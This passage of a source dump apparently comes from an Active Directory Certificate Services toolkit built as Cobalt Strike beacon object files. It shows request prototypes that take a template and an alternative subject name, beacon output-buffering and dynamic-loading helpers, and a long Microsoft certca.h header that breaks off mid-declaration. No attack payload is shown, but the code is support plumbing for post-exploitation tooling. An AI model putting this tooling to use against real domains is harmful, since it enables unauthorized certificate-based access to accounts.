HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey * pPrivateKey, BSTR bstrTemplate, BSTR bstrSubject, BSTR bstrAltName, BSTR bstrAltUrl, IX509CertificateRequestPkcs10V3 ** lppCertificateRequestPkcs10V3, BOOL addAppPolicy, BOOL dns);
HRESULT _adcs_request_CreateEnrollment(IX509CertificateRequestPkcs10V3 * pCertificateRequestPkcs10V3, IX509Enrollment ** lppEnrollment);
HRESULT _adcs_request_SubmitEnrollment(IX509Enrollment * pEnrollment, BSTR bstrCA, BSTR * lpbstrCertificate);

HRESULT adcs_request( LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lpswzSubject, LPCWSTR lpswzAltName, LPCWSTR lpswzAltUrl, LPCWSTR lpswzPfxPassword, BOOL bInstall, BOOL bMachine, BOOL addAppPolicy, BOOL dns, BOOL bPem );


================================================
FILE: AD-BOF/ADCS-BOF/src/request/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif

//#pragma GCC diagnostic ignored "-Wint-conversion"
//formatp output = {1}; // this is just done so its we don't go into .bss which isn't handled properly
char * output = (char*)1;
WORD currentoutsize = 1;
HANDLE trash = (HANDLE)1; // Needed for x64 to not give relocation error
//#pragma GCC diagnostic pop

int bofstart();
#ifdef BOF
void internal_printf(const char* format, ...);
#endif
char * Utf16ToUtf8(const wchar_t* input);
wchar_t * Utf8ToUtf16(const char * input);
void printoutput(BOOL done);
void bofstop();

#ifdef BOF
int bofstart()
{   
    //output.original=NULL;
    //handle any global initilization here
    //BeaconFormatAlloc(&output, bufsize+256);
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;

}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    char* transferBuffer = (char*)intAlloc(bufsize);
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            int transfersize = 0;
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            //BeaconFormatPrintf(&output, transferBuffer); // copy it to cobalt strikes output buffer
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{
    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}
#endif

#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

//GetProcAddress, LoadLibraryA, GetModuleHandle, and FreeLibrary are gimmie functions
//
// DynamicLoad
// Retrieves a function pointer given the BOF library-function name
// szLibrary           - The library containing the function you want to load
// szFunction          - The Function that you want to load
// Returns a FARPROC function pointer if successful, or NULL if lookup fails
//
FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif

char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

wchar_t* Utf8ToUtf16(const char* input)
{
    int ret = KERNEL32$MultiByteToWideChar(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0
    );

    wchar_t* newString = (wchar_t*)intAlloc(sizeof(wchar_t) * ret);

    ret = KERNEL32$MultiByteToWideChar(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        ret
    );

    if (0 == ret)
    {
        //printf("Failed to convert UNICODE string from UTF-16 to UTF-8. Last error: %d\n", (int)GetLastError());
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

#ifndef BOF
DWORD SetPrivilege(
    HANDLE hTokenArg,          // access token handle
    LPCSTR lpszPrivilege,  // name of privilege to enable/disable
    BOOL bEnablePrivilege   // to enable or disable privilege
    ) 
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tp;
    LUID luid;
    DWORD dwErrorCode = ERROR_SUCCESS;

    if ( hTokenArg )
    {
        hToken = hTokenArg;
    }
    else
    {
        // Open a handle to the access token for the calling process. That is this running program
        if( FALSE == ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))    
        {
            dwErrorCode = KERNEL32$GetLastError();
            goto SetPrivilege_end;
        }
    }
    

    if ( FALSE == ADVAPI32$LookupPrivilegeValueA( 
            NULL,            // lookup privilege on local system
            lpszPrivilege,   // privilege to lookup 
            &luid ) )        // receives LUID of privilege
    {
        dwErrorCode = KERNEL32$GetLastError();
        goto SetPrivilege_end; 
    }

    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    if (bEnablePrivilege)
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    else
        tp.Privileges[0].Attributes = 0;

    // Enable the privilege or disable all privileges.

    if ( FALSE == ADVAPI32$AdjustTokenPrivileges(
           hToken, 
           FALSE, 
           &tp, 
           sizeof(TOKEN_PRIVILEGES), 
           (PTOKEN_PRIVILEGES) NULL, 
           (PDWORD) NULL) )
    {
        dwErrorCode = KERNEL32$GetLastError();
        goto SetPrivilege_end; 
    } 

    // Possibly ERROR_NOT_ALL_ASSIGNED
    dwErrorCode = KERNEL32$GetLastError();

SetPrivilege_end:

    if ( !hTokenArg )
    {
        if ( hToken )
        {
            KERNEL32$CloseHandle(hToken);
            hToken = NULL;
        }
    }

    return dwErrorCode;
}
#endif

//release any global functions here
void bofstop()
{

    return;
}


================================================
FILE: AD-BOF/ADCS-BOF/src/request/certca.h
================================================
//+--------------------------------------------------------------------------
//
// Microsoft Windows
// Copyright (C) Microsoft Corporation, 1996 - 2000
//
// File:        certca.h
//
// Contents:    Definition of the CA Info API
//
// History:     12-dec-97       petesk  created
//              28-Jan-2000     xiaohs  updated
//
//---------------------------------------------------------------------------


#ifndef __CERTCA_H__
#define __CERTCA_H__


#if _MSC_VER > 1000
#pragma once
#endif

#ifdef __cplusplus
extern "C"{
#endif


#include <wincrypt.h>


typedef VOID *  HCAINFO;

typedef VOID *  HCERTTYPE;

typedef VOID *  HCERTTYPEQUERY;

//*****************************************************************************
//
// Flags used by CAFindByName, CAFindByCertType, CAFindByIssuerDN and
// CAEnumFirstCA
//
// See comments on each API for a list of applicable flags
//
//*****************************************************************************
//the wszScope supplied is a domain location in the DNS format
#define CA_FLAG_SCOPE_DNS               0x00000001

// include untrusted CA
#define CA_FIND_INCLUDE_UNTRUSTED       0x00000010

// running as local system.  Used to verify CA certificate chain
#define CA_FIND_LOCAL_SYSTEM            0x00000020

// Include CAs that do not support templates
#define CA_FIND_INCLUDE_NON_TEMPLATE_CA 0x00000040

// The value passed in for scope is the LDAP binding handle to use during finds
#define CA_FLAG_SCOPE_IS_LDAP_HANDLE    0x00000800

// Return CAs from local machine context
#define CA_ENUM_ADMINISTRATOR_FORCE_MACHINE    0x00001000

// Enumerate all Types which are present on the CA object 
#define CA_ENUM_INCLUDE_INVALID_TYPES    0x00004000



//*****************************************************************************
//
// Flags used by CAEnumCertTypesForCA, CAEnumCertTypes,
// CAFindCertTypeByName, CAEnumCertTypesForCAEx, and CAEnumCertTypesEx.
//
// See comments on each API for a list of applicable flags
//
//*****************************************************************************
//  Instead of enumerating the certificate types supported by the CA, enumerate
// ALL certificate types which the CA may choose to support.
#define CA_FLAG_ENUM_ALL_TYPES          0x00000004

// running as local system.  Used to find cached information in the registry.
#define CT_FIND_LOCAL_SYSTEM            CA_FIND_LOCAL_SYSTEM

// Return machine types, as opposed to user types
#define CT_ENUM_MACHINE_TYPES           0x00000040

// Return user types, as opposed to user types
#define CT_ENUM_USER_TYPES              0x00000080

// Find the certificate type by its OID, instead of its name
#define CT_FIND_BY_OID                  0x00000200

// Disable the cache expiration check
#define CT_FLAG_NO_CACHE_LOOKUP         0x00000400

// The value passed in for scope is the LDAP binding handle to use during finds
#define CT_FLAG_SCOPE_IS_LDAP_HANDLE    CA_FLAG_SCOPE_IS_LDAP_HANDLE

// Return the cert types from the local machine context
#define CT_ENUM_ADMINISTRATOR_FORCE_MACHINE    CA_ENUM_ADMINISTRATOR_FORCE_MACHINE

// For perf issue, do not cache registry for admin machine context
#define CT_ENUM_NO_CACHE_TO_REGISTRY    0x00002000

// Enumerate all Types which are present on the CA object 
#define CT_FLAG_ENUM_INCLUDE_INVALID_TYPES     CA_ENUM_INCLUDE_INVALID_TYPES


//*****************************************************************************
//
// Certification Authority manipulation APIs
//
//*****************************************************************************


// CAFindByName
//
// Given the Name of a CA (CN), find the CA within the given domain and return
// the given phCAInfo structure.
//
// wszCAName    - Common name of the CA
//
// wszScope     - The distinguished name (DN) of the entry at which to start
//		  the search.  Equivalent of the "base" parameter of the
//		  ldap_search_sxxx APIs.
//                NULL if use the current domain.
//                If CA_FLAG_SCOPE_DNS is set, wszScope is in the DNS format.
//                If CA_FLAG_SCOPE_IS_LDAP_HANDLE is set, wszScope is the LDAP
//		  binding handle to use during finds.
//
// dwFlags      - Oring of the following flags:
//                CA_FLAG_SCOPE_DNS
//                CA_FIND_INCLUDE_UNTRUSTED
//                CA_FIND_LOCAL_SYSTEM
//                CA_FIND_INCLUDE_NON_TEMPLATE_CA
//                CA_FLAG_SCOPE_IS_LDAP_HANDLE
//
// phCAInfo     - Handle to the returned CA.
//
// Return:        Returns S_OK if CA was found.
//

HRESULT
WINAPI
CAFindByName(
    IN  LPCWSTR     wszCAName,
    IN  LPCWSTR     wszScope,
    IN  DWORD       dwFlags,
    OUT HCAINFO *   phCAInfo
    );

//
// CAFindByCertType
//
// Given the Name of a Cert Type, find all the CAs within the given domain and
// return the given phCAInfo structure.
//
// wszCertType  - Common Name of the cert type
//
// wszScope     - The distinguished name (DN) of the entry at which to start
//		  the search.  Equivalent of the "base" parameter of the
//		  ldap_search_sxxx APIs.
//                NULL if use the current domain.
//                If CA_FLAG_SCOPE_DNS is set, wszScope is in the DNS format.
//                If CA_FLAG_SCOPE_IS_LDAP_HANDLE is set, wszScope is the LDAP
//		  binding handle to use during finds.
//
// dwFlags      - Oring of the following flags:
//                CA_FLAG_SCOPE_DNS
//                CA_FIND_INCLUDE_UNTRUSTED
//                CA_FIND_LOCAL_SYSTEM
//                CA_FIND_INCLUDE_NON_TEMPLATE_CA
//                CA_FLAG_SCOPE_IS_LDAP_HANDLE
//
// phCAInfo     - Handle to enumeration of CAs supporting the specified cert
//		  type.
//
// Return:        Returns S_OK on success.
//                Will return S_OK if none are found.
//                *phCAInfo will contain NULL
//

HRESULT
WINAPI
CAFindByCertType(
    IN  LPCWSTR     wszCertType,
    IN  LPCWSTR     wszScope,
    IN  DWORD       dwFlags,
    OUT HCAINFO *   phCAInfo
    );


//
// CAFindByIssuerDN
// Given the DN of a CA, find the CA within the given domain and return the
// given phCAInfo handle.
//
// pIssuerDN    - a cert name blob from the CA's certificate.
//
// wszScope     - The distinguished name (DN) of the entry at which to start
//		  the search.  Equivalent of the "base" parameter of the
//		  ldap_search_sxxx APIs.
//                NULL if use the current domain.
//                If CA_FLAG_SCOPE_DNS is set, wszScope is in the DNS format.
//                If CA_FLAG_SCOPE_IS_LDAP_HANDLE is set, wszScope is the LDAP
//		  binding handle to use during finds.
//
// dwFlags      - Oring of the following flags:
//                CA_FLAG_SCOPE_DNS
//                CA_FIND_INCLUDE_UNTRUSTED
//                CA_FIND_LOCAL_SYSTEM
//                CA_FIND_INCLUDE_NON_TEMPLATE_CA
//                CA_FLAG_SCOPE_IS_LDAP_HANDLE 
//
//
// Return:      Returns S_OK if CA was found.
//


HRESULT
WINAPI
CAFindByIssuerDN(
    IN  CERT_NAME_BLOB const *  pIssuerDN,
    IN  LPCWSTR                 wszScope,
    IN  DWORD                   dwFlags,
    OUT HCAINFO *               phCAInfo
    );


//
// CAEnumFirstCA
// Enumerate the CAs in a scope
//
// wszScope     - The distinguished name (DN) of the entry at which to start
//		  the search.  Equivalent of the "base" parameter of the
//		  ldap_search_sxxx APIs.
//                NULL if use the current domain. 
//                If CA_FLAG_SCOPE_DNS is set, wszScope is in the DNS format.
//                If CA_FLAG_SCOPE_IS_LDAP_HANDLE is set, wszScope is the LDAP
//		  binding handle to use during finds.
//
// dwFlags      - Oring of the following flags:
//                CA_FLAG_SCOPE_DNS
//                CA_FIND_INCLUDE_UNTRUSTED
//                CA_FIND_LOCAL_SYSTEM
//                CA_FIND_INCLUDE_NON_TEMPLATE_CA
//                CA_FLAG_SCOPE_IS_LDAP_HANDLE 
//                CA_ENUM_ADMINISTRATOR_FORCE_MACHINE
//
// phCAInfo     - Handle to enumeration of CAs supporting the specified cert
//		  type.
//
//
// Return:        Returns S_OK on success.
//                Will return S_OK if none are found.
//                *phCAInfo will contain NULL
//

HRESULT
WINAPI
CAEnumFirstCA(
    IN  LPCWSTR          wszScope,
    IN  DWORD            dwFlags,
    OUT HCAINFO *        phCAInfo
    );


//
// CAEnumNextCA
// Find the Next CA in an enumeration.
//
// hPrevCA      - Current CA in an enumeration.
//
// phCAInfo     - next CA in an enumeration.
//
// Return:        Returns S_OK on success.
//                Will return S_OK if none are found.
//                *phCAInfo will contain NULL
//

HRESULT
WINAPI
CAEnumNextCA(
    IN  HCAINFO          hPrevCA,
    OUT HCAINFO *        phCAInfo
    );

//
// CACreateNewCA
// Create a new CA of given name.
//
// wszCAName    - Common name of the CA
//
// wszScope     - The distinguished name (DN) of the entry at which to create
//		  the CA object.  We will add the "CN=...,..,CN=Services" after
//		  the DN.
//                NULL if use the current domain. 
//                If CA_FLAG_SCOPE_DNS is set, wszScope is in the DNS format.
//
// dwFlags      - Oring of the following flags:
//                CA_FLAG_SCOPE_DNS
//
// phCAInfo     - Handle to the returned CA.
//
// See above for other parameter definitions
//
// Return:        Returns S_OK if CA was created.
//
// NOTE:  Actual updates to the CA object may not occur until CAUpdateCA is
//	  called.  In order to successfully update a created CA, the
//	  Certificate must be set, as well as the Certificate Types property.
//

HRESULT
WINAPI
CACreateNewCA(
    IN  LPCWSTR     wszCAName,
    IN  LPCWSTR     wszScope,
    IN  DWORD       dwFlags,
    OUT HCAINFO *   phCAInfo
    );

//
// CAUpdateCA
// Write any changes made to the CA back to the CA object.
//
// hCAInfo      - Handle to an open CA object.
//

HRESULT
WINAPI
CAUpdateCA(
    IN HCAINFO    hCAInfo
    );

//
// CAUpdateCAEx
// Write any changes made to the CA back to the CA object.
//
// hCAInfo      - Handle to an open CA object.
//
//
// lpPara       - If CA_FLAG_SCOPE_IS_LDAP_HANDLE is set, lpPara is the LDAP
//		  binding handle to use during update.
// dwFlags      - Oring of the following flags:
//                  CA_FLAG_SCOPE_IS_LDAP_HANDLE
//
// Return:        Returns S_OK on success.
//
HRESULT
WINAPI
CAUpdateCAEx(
    IN LPVOID   lpPara,
    IN DWORD    dwFlags,
    IN HCAINFO  hCAInfo
    );

//
// CADeleteCA
// Delete the CA object from the DS.
//
// hCAInfo      - Handle to an open CA object.
//

HRESULT
WINAPI
CADeleteCA(
    IN HCAINFO    hCAInfo
    );

//
// CADeleteCAEx
// Delete the CA object from the DS.
//
// hCAInfo      - Handle to an open CA object.
//
//
// lpPara       - If CA_FLAG_SCOPE_IS_LDAP_HANDLE is set, lpPara is the LDAP
//		  binding handle to use during update.
// dwFlags      - Oring of the following flags:
//                  CA_FLAG_SCOPE_IS_LDAP_HANDLE
//
// Return:        Returns S_OK on success.

HRESULT
WINAPI
CADeleteCAEx(
    IN LPVOID   lpPara,
    IN DWORD    dwFlags,
    IN HCAINFO  hCAInfo
    );

//
// CACountCAs
// return the number of CAs in this enumeration
//

DWORD
WINAPI
CACountCAs(
    IN  HCAINFO  hCAInfo
    );

//
// CAGetDN
// returns the DN of the associated DS object
//

LPCWSTR
WINAPI
CAGetDN(
    IN HCAINFO hCAInfo
    );


//
// CACloseCA
// Close an open CA handle
//
// hCAInfo      - Handle to an open CA object.
//

HRESULT
WINAPI
CACloseCA(
    IN HCAINFO hCA
    );



//
// CAGetCAProperty - Given a property name, retrieve a
// property from a CAInfo.
//
// hCAInfo              - Handle to an open CA object.
//
// wszPropertyName      - Name of the CA property
//
// pawszPropertyValue   - A pointer into which an array of WCHAR strings is
//			  written, containing the values of the property.  The
//			  last element of the array points to NULL.
//                        If the property is single valued, then the array
//			  returned contains 2 elements, the first pointing to
//			  the value, the second pointing to NULL.  This pointer
//			  must be freed by CAFreeCAProperty.
//
// Returns              - S_OK on success.
//

HRESULT
WINAPI
CAGetCAProperty(
    IN  HCAINFO     hCAInfo,
    IN  LPCWSTR     wszPropertyName,
    _Out_ PZPWSTR  *pawszPropertyValue
    );


//
// CAFreeProperty
// Frees a previously retrieved property value.
//
// hCAInfo              - Handle to an open CA object.
//
// awszPropertyValue    - pointer to the previously retrieved property value.
//

HRESULT
WINAPI
CAFreeCAProperty(
    _In_ HCAINFO hCAInfo,
    _In_ PZPWSTR awszPropertyValue
    );


//
// CASetCAProperty - Given a property name, set its value.
//
// hCAInfo              - Handle to an open CA object.
//
// wszPropertyName      - Name of the CA property
//
// awszPropertyValue    - An array of values to set for this property.  The
//			  last element of this - array should be NULL.
//                        For single valued properties, the values beyond the
//                        first will be ignored upon update.
//
// Returns              - S_OK on success.
//

HRESULT
WINAPI
CASetCAProperty(
    IN HCAINFO      hCAInfo,
    IN LPCWSTR      wszPropertyName,
    _In_ PZPWSTR awszPropertyValue
    );


//*****************************************************************************
///
// CA Properties
//
//*****************************************************************************

// simple name of the CA
#define CA_PROP_NAME                    L"cn"

// display name of the CA object
#define CA_PROP_DISPLAY_NAME            L"displayName"

// dns name of the machine
#define CA_PROP_DNSNAME                 L"dNSHostName"

// DS Location of CA object (DN)
#define CA_PROP_DSLOCATION              L"distinguishedName"

// Supported cert types
#define CA_PROP_CERT_TYPES              L"certificateTemplates"

// Supported signature algs
#define CA_PROP_SIGNATURE_ALGS          L"signatureAlgorithms"

// DN of the CA's cert
#define CA_PROP_CERT_DN                 L"cACertificateDN"

#define CA_PROP_ENROLLMENT_PROVIDERS    L"enrollmentProviders"

// CA's description
#define CA_PROP_DESCRIPTION	        L"Description"

// CA's URL
#define CA_PROP_WEB_SERVERS	        L"msPKI-Enrollment-Servers"

// CA's Site Name
#define CA_PROP_SITENAME	        L"msPKI-Site-Name"

//
// CAGetCACertificate - Return the current certificate for
// this CA.
//
// hCAInfo      - Handle to an open CA object.
//
// ppCert       - Pointer into which a certificate is written.  This
//		  certificate must be freed via CertFreeCertificateContext.
//                This value will be NULL if no certificate is set for this CA.
//

HRESULT
WINAPI
CAGetCAFlags(
    IN HCAINFO  hCAInfo,
    OUT DWORD  *pdwFlags
    );

//*****************************************************************************
//
// CA Flags
//
//*****************************************************************************

// The CA supports certificate templates
#define CA_FLAG_NO_TEMPLATE_SUPPORT                 0x00000001

// The CA supports NT authentication for requests
#define CA_FLAG_SUPPORTS_NT_AUTHENTICATION          0x00000002

// The cert requests may be pended
#define CA_FLAG_CA_SUPPORTS_MANUAL_AUTHENTICATION   0x00000004

// The cert requests may be pended
#define CA_FLAG_CA_SERVERTYPE_ADVANCED              0x00000008

#define CA_MASK_SETTABLE_FLAGS                      0x0000ffff


//
// CASetCAFlags
// Sets the Flags of a cert type
//
// hCertType    - handle to the CertType
//
// dwFlags      - Flags to be set
//

HRESULT
WINAPI
CASetCAFlags(
    IN HCAINFO             hCAInfo,
    IN DWORD               dwFlags
    );

HRESULT
WINAPI
CAGetCACertificate(
    IN  HCAINFO     hCAInfo,
    OUT PCCERT_CONTEXT *ppCert
    );


//
// CASetCACertificate - Set the certificate for a CA this CA.
//
// hCAInfo      - Handle to an open CA object.
//
// pCert        - Pointer to a certificate to set as the CA's certificate.
//

HRESULT
WINAPI
CASetCACertificate(
    IN  HCAINFO     hCAInfo,
    IN PCCERT_CONTEXT pCert
    );


//
// CAGetCAExpiration
// Get the expirations period for a CA.
//
// hCAInfo              - Handle to an open CA handle.
//
// pdwExpiration        - expiration period in dwUnits time
//
// pdwUnits             - Units identifier
//

HRESULT
WINAPI
CAGetCAExpiration(
    HCAINFO hCAInfo,
    DWORD * pdwExpiration,
    DWORD * pdwUnits
    );

#define CA_UNITS_DAYS   1
#define CA_UNITS_WEEKS  2
#define CA_UNITS_MONTHS 3
#define CA_UNITS_YEARS  4


//
// CASetCAExpiration
// Set the expirations period for a CA.
//
// hCAInfo              - Handle to an open CA handle.
//
// dwExpiration         - expiration period in dwUnits time
//
// dwUnits              - Units identifier
//

HRESULT
WINAPI
CASetCAExpiration(
    HCAINFO hCAInfo,
    DWORD dwExpiration,
    DWORD dwUnits
    );

//
// CASetCASecurity
// Set the list of Users, Groups, and Machines allowed to access this CA.
//
// hCAInfo      - Handle to an open CA handle.
//
// pSD          - Security descriptor for this CA
//

HRESULT
WINAPI
CASetCASecurity(
    IN HCAINFO                 hCAInfo,
    IN PSECURITY_DESCRIPTOR    pSD
    );

//
// CAGetCASecurity
// Get the list of Users, Groups, and Machines allowed to access this CA.
//
// hCAInfo      - Handle to an open CA handle.
//
// ppSD         - Pointer to a location receiving the pointer to the security
//		  descriptor.  Free via LocalFree.
//

HRESULT
WINAPI
CAGetCASecurity(
    IN  HCAINFO                    hCAInfo,
    OUT PSECURITY_DESCRIPTOR *     ppSD
    );

//
// CAAccessCheck
// Determine whether the principal specified by
// ClientToken can get a cert from the CA.
//
// hCAInfo      - Handle to the CA
//
// ClientToken  - Handle to an impersonation token that represents the client
//		  attempting request this cert type.  The handle must have
//		  TOKEN_QUERY access to the token; otherwise, the function
//		  fails with ERROR_ACCESS_DENIED.
//
// Return: S_OK on success
//

HRESULT
WINAPI
CAAccessCheck(
    IN HCAINFO      hCAInfo,
    IN HANDLE       ClientToken
    );

//
// CAAccessCheckEx
// Determine whether the principal specified by
// ClientToken can get a cert from the CA.
//
// hCAInfo      - Handle to the CA
//
// ClientToken  - Handle to an impersonation token that represents the client
//		  attempting request this cert type.  The handle must have
//		  TOKEN_QUERY access to the token; otherwise, the function
//		  fails with ERROR_ACCESS_DENIED.
//
// dwOption     - Can be one of the following:
//                        CERTTYPE_ACCESS_CHECK_ENROLL

//                  dwOption can be CERTTYPE_ACCESS_CHECK_NO_MAPPING to 
//                  disallow default mapping of client token

//
// Return: S_OK on success
//

HRESULT
WINAPI
CAAccessCheckEx(
    IN HCAINFO      hCAInfo,
    IN HANDLE       ClientToken,
    IN DWORD        dwOption
    );


// Used for certenroll.idl:
// certenroll_begin -- CA_ACCESS_RIGHT_XXX

//
// Access Rights for HCAINFO and HCERTTYPE
//

#define CA_ACCESS_RIGHT_READ                          0x01
 
#define CA_ACCESS_RIGHT_ENROLL                        0x02

#define CA_ACCESS_RIGHT_AUTO_ENROLL                   0x04

// certenroll_end


//
// dwContext for access right
//
#define CA_CONTEXT_CURRENT                            0x01
 
#define CA_CONTEXT_ADMINISTRATOR_FORCE_MACHINE        0x02

//
// CAGetAccessRights
//
// Determine the access rights of the HCAInfo based on the current context
//
// hCAInfo      - Handle to the CA
//
// dwContext    - Can be one of the following:
//                 CA_CONTEXT_CURREN 
//                 CA_CONTEXT_ADMINISTRATOR_FORCE_MACHINE
//
// pdwAccessRight- Oring of the following flags:
//                 CA_ACCESS_RIGHT_READ
//                 CA_ACCESS_RIGH_ENROLL
//
//
// Return: S_OK on success
//
HRESULT
WINAPI
CAGetAccessRights(
    IN  HCAINFO      hCAInfo,
    IN  DWORD        dwContext,
    OUT DWORD        *pdwAccessRights 
    );


// CAIsValid
//
// Determine if the HCAINFO has full properties and readable
// from the current context.  For CAs that is not readable from
// current context, only CA_PROP_NAME and CA_PROP_DNSNAME are present.
//
// hCAInfo      - Handle to the CA
//
// pValid       - TRUE is the CA is readable
//
// Return: S_OK on success
//
HRESULT
WINAPI
CAIsValid(
    IN  HCAINFO     hCAInfo,
    OUT BOOL        *pValid
    );

//
// CAEnumCertTypesForCA - Given a HCAINFO, retrieve handle to the cert types
// supported or known by this CA.  CAEnumNextCertType can be used to enumerate
// through the cert types.
//
// hCAInfo      - Handle to an open CA handle or NULL if CT_FLAG_ENUM_ALL_TYPES
//		  is set in dwFlags.
//
// dwFlags      - The following flags may be or'd together
//                CA_FLAG_ENUM_ALL_TYPES 
//                CT_FIND_LOCAL_SYSTEM
//                CT_ENUM_MACHINE_TYPES
//                CT_ENUM_USER_TYPES
//                CT_FLAG_NO_CACHE_LOOKUP  
//
// phCertType   - Enumeration of certificate types.
//


HRESULT
WINAPI
CAEnumCertTypesForCA(
    IN  HCAINFO     hCAInfo,
    IN  DWORD       dwFlags,
    OUT HCERTTYPE * phCertType
    );

//
// CAEnumCertTypesForCAEx - Given a HCAINFO, retrieve handle to the cert types
// supported or known by this CA.  CAEnumNextCertTypeEx can be used to enumerate
// through the cert types.  It optional takes a LDAP handle.
//
// hCAInfo      - Handle to an open CA handle or NULL if CT_FLAG_ENUM_ALL_TYPES
//		          is set in dwFlags.
//
// wszScope     - NULL if use the current domain.
//                      If CT_FLAG_SCOPE_IS_LDAP_HANDLE is set, wszScope is the LDAP
//		                binding handle to use during finds.
//
// dwFlags      - The following flags may be or'd together
//                CA_FLAG_ENUM_ALL_TYPES 
//                CT_FIND_LOCAL_SYSTEM
//                CT_ENUM_MACHINE_TYPES
//                CT_ENUM_USER_TYPES
//                CT_FLAG_NO_CACHE_LOOKUP  
//                CT_FLAG_SCOPE_IS_LDAP_HANDLE 
// 
// phCertType   - Enumeration of certificate types.
//


HRESULT
WINAPI
CAEnumCertTypesForCAEx(
    IN  HCAINFO     hCAInfo,
    IN  LPCWSTR     wszScope,
    IN  DWORD       dwFlags,
    OUT HCERTTYPE * phCertType
    );


//
// CAAddCACertificateType
// Add a certificate type to a CA.  If the cert type has already been added to
// the CA, it will not be added again. 
//
// hCAInfo      - Handle to an open CA.
//
// hCertType    - Handle to the CertType
//


HRESULT
WINAPI
CAAddCACertificateType(
    HCAINFO hCAInfo,
    HCERTTYPE hCertType);


//
// CARemoveCACertificateType
// Remove a certificate type from a CA.  If the CA does not include this cert
// type, this call does nothing. 
//
// hCAInfo      - Handle to an open CA.
//
// hCertType    - Handle to the CertType
//


HRESULT
WINAPI
CARemoveCACertificateType(
    HCAINFO hCAInfo,
    HCERTTYPE hCertType);

//
// CAAddCACertificateTypeEx
// Add a certificate type to a CA.  If the cert type has already been added to
// the CA, it will not be added again. Either the hCertType Handle
// or the CN of the CertType must not be Null.
//
// hCAInfo      - Handle to an open CA.
//
// hCertType    - Handle to the CertType
//
// pwcszCertTypeName    - CN of the Cert Type
//

HRESULT
WINAPI
CAAddCACertificateTypeEx(
    _In_ HCAINFO hCAInfo,
    _In_opt_ HCERTTYPE hCertType,
